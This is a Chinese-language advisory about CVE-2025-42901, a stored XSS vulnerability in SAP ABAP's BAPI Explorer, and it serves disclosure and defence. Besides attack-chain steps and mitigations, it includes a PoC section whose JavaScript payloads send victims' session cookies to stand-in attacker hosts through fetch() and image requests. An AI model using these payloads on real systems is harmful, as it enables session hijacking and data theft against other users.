CVE-2025-42901 SAP ABAP应用服务器BAPI Explorer存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-42901

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SAP Application Server for ABAP

漏洞概述

CVE-2025-42901是SAP Application Server for ABAP（SAP NetWeaver Application Server ABAP）中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于BAPI Explorer功能模块中，允许经过身份验证的低权限攻击者在受影响的应用程序中存储恶意的JavaScript载荷。当其他合法用户（受害者）访问BAPI Explorer的受影响功能时，存储的恶意脚本将在受害者的浏览器中自动执行，从而实现对受害者会话的劫持或敏感信息的窃取。

根据CVSS 3.1评分体系，该漏洞评分为5.4分，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N）。在影响方面，该漏洞对机密性（C:L）和完整性（I:L）具有低影响，对可用性（A:N）无影响。

该漏洞由SAP官方安全团队（[email protected]）发现，并于2025年10月14日公开披露。SAP已发布相应的安全补丁（参考SAP Note 3652788），建议受影响的用户尽快应用安全更新以修复此漏洞。

此漏洞的利用需要攻击者首先拥有有效的SAP系统账户，但由于SAP系统中大量用户拥有不同程度的访问权限，且BAPI Explorer是开发人员和系统管理员常用的功能，因此该漏洞的实际威胁面仍然较广。

技术细节

该漏洞是SAP Application Server for ABAP中BAPI Explorer功能模块的一个典型的存储型XSS漏洞。其根本原因在于BAPI Explorer在处理用户输入数据时，未对输入内容进行充分的过滤和转义，导致攻击者可以将恶意JavaScript代码作为合法数据存储到服务器端。

技术原理分析：
1. BAPI Explorer是SAP ABAP系统中用于浏览和调用BAPI（Business Application Programming Interface）的工具，允许用户查看和测试系统中的业务接口。
2. 当用户通过BAPI Explorer输入数据（如BAPI名称、参数值或描述信息）时，应用程序未对这些输入进行HTML/JavaScript编码或过滤。
3. 攻击者可以利用此缺陷，在正常的数据字段中注入恶意脚本标签，如`<script>alert(document.cookie)</script>`或更复杂的载荷。
4. 这些恶意载荷被持久化存储在服务器端，每当其他用户访问包含该数据的BAPI Explorer页面时，浏览器会解析并执行存储的恶意脚本。

利用方式：
- 攻击者使用合法凭据登录SAP系统，访问BAPI Explorer功能
- 在BAPI Explorer的输入字段中注入恶意JavaScript代码
- 恶意代码被服务器存储
- 当受害者（通常是其他授权用户）访问BAPI Explorer并查看相关数据时，恶意脚本在其浏览器中执行
- 攻击者可通过XSS窃取用户会话cookie、进行钓鱼攻击或执行其他恶意操作

由于该漏洞需要认证才能利用，且影响范围限于已认证用户，因此其严重程度被评定为中危。

攻击链分析

STEP 1

步骤1：获取认证凭据

攻击者首先获取有效的SAP系统账户凭据，可以通过钓鱼、社会工程或其他方式获得低权限用户的登录信息。

STEP 2

步骤2：登录SAP系统

攻击者使用获取的凭据登录SAP Application Server for ABAP系统，访问BAPI Explorer功能模块。

STEP 3

步骤3：注入恶意载荷

攻击者在BAPI Explorer的输入字段（如BAPI名称、参数描述等）中注入精心构造的恶意JavaScript代码。由于应用程序未对这些输入进行充分的过滤和转义，恶意代码被成功存储。

STEP 4

步骤4：载荷持久化存储

恶意JavaScript载荷被持久化存储在SAP服务器端，与正常的BAPI数据关联在一起。

STEP 5

步骤5：受害者访问触发执行

当合法用户（受害者）访问BAPI Explorer并查看包含恶意载荷的数据时，浏览器自动解析并执行存储的恶意脚本。

STEP 6

步骤6：数据窃取或会话劫持

恶意脚本在受害者浏览器中执行后，攻击者可以窃取会话cookie、进行钓鱼攻击、篡改页面内容或执行其他恶意操作，实现对受害者会话的控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for SAP BAPI Explorer (CVE-2025-42901) -->
<!-- This PoC demonstrates how a malicious payload can be stored in BAPI Explorer -->
<!-- Note: Requires valid authentication credentials to exploit -->

// Step 1: Attacker injects malicious JavaScript payload into BAPI Explorer input field
// The payload will be stored on the server and executed when victims view the affected page

// Example malicious payload to inject into BAPI name or description field:
var xssPayload = '<script>' +
    // Steal session cookies (if not HttpOnly protected)
    'var img=new Image();' +
    'img.src="http://attacker-server.com/steal?cookie="+encodeURIComponent(document.cookie);' +
    // Or redirect victim to phishing page
    // 'window.location="http://attacker-server.com/phishing";' +
    '</script>';

// Step 2: Submit the payload through BAPI Explorer interface
// The payload gets stored in the backend without proper sanitization

// Step 3: When victim user accesses BAPI Explorer and views the stored data,
// the browser executes the malicious script automatically

// PoC using fetch API to demonstrate the exploitation flow:
function exploitBAPIExplorer(targetUrl, sessionCookie) {
    // Inject XSS payload into BAPI Explorer
    var payload = {
        bapi_name: '<script>fetch("http://attacker.com/log?data="+document.cookie)</script>',
        description: '<img src=x onerror="fetch(\'http://attacker.com/log?session=\'+document.cookie)">'
    };
    
    // Send payload to BAPI Explorer endpoint
    fetch(targetUrl + '/sap/bc/bsp/sap/bapi_explorer/', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Cookie': sessionCookie
        },
        body: new URLSearchParams(payload)
    });
    
    // The payload is now stored and will execute when other users view the page
}

// Detection payload for testing:
// '<script>alert("XSS-CVE-2025-42901")</script>'

影响范围

SAP Application Server for ABAP（具体版本请参考SAP Note 3652788）

防御指南

临时缓解措施

在无法立即应用安全补丁的情况下，建议采取以下临时缓解措施：1）限制BAPI Explorer功能的访问权限，仅授权必要的可信用户使用；2）在Web代理或反向代理层面部署XSS过滤规则，对请求和响应中的恶意脚本进行检测和拦截；3）实施内容安全策略（CSP）头部，限制内联脚本的执行；4）为用户会话cookie设置HttpOnly标志，降低会话被窃取的风险；5）加强对SAP系统用户活动的监控，及时发现可疑的输入行为；6）定期审查BAPI Explorer中存储的数据，清理可疑内容。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-42901
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-42901
3 Details https://www.cvedetails.com/cve/CVE-2025-42901/
4 VulDB https://vuldb.com/cve/CVE-2025-42901
5 Link https://me.sap.com/notes/3652788
6 Link https://url.sap/sapsecuritypatchday